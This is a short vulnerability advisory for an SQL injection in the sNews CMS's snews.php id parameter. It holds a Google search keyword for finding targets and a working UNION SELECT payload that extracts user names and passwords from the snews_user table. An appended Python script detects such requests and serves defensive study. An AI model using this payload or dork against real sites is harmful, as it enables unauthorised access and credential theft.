Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: Ubuntu 12.10 / Win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"
*************************************************************
SQL PoC:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
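
Detection logic for the request shape in the PoC above, as an added example that is not part of the original advisory: it flags requests to `snews.php?act=shownews` whose `id` is not a plain integer, after treating `/**/` comments as whitespace. The request lines are constructed, and the rule that legitimate `id` values are unsigned integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request lines for illustration; not taken from real logs.
SAMPLE_REQUESTS = [
    "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1",
    "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,"
    "concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user"
    "/**/where/**/id%20like%201/* HTTP/1.1",
    "GET /snews/snews.php?act=shownews&id=7%20UNION%20ALL%20SELECT%201 HTTP/1.1",
    "GET /snews/snews.php?act=shownews&id=23%27 HTTP/1.1",
    "GET /blog/search.php?q=union+select+tips HTTP/1.1",
]

# A block comment, terminated or left open at the end of the value.
BLOCK_COMMENT = re.compile(r"/\*.*?(?:\*/|\Z)", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I)


def normalize(value: str) -> str:
    """Replace SQL block comments with spaces, as the SQL parser treats them."""
    return BLOCK_COMMENT.sub(" ", value)


def classify(request_line: str) -> str:
    """Return 'ok', 'non-numeric-id' or 'union-select' for one request line."""
    _method, _, rest = request_line.partition(" ")
    target = rest.rsplit(" ", 1)[0]          # drop the trailing HTTP version
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if not url.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
        return "ok"                          # only the endpoint from the advisory
    verdict = "ok"
    for raw_id in params.get("id", []):
        if UNION_SELECT.search(normalize(raw_id)):
            return "union-select"
        if not re.fullmatch(r"[0-9]+", raw_id):
            verdict = "non-numeric-id"       # assumption: ids are plain integers
    return verdict


def scan(lines):
    """Return (verdict, line) pairs for every request that is not 'ok'."""
    return [(v, l) for l in lines if (v := classify(l)) != "ok"]


if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_REQUESTS):
        print(f"{verdict:15} {line[:90]}")
```

The integer check is the one that matters: it still flags the request when the payload is rewritten to avoid the `union select` pattern.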

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*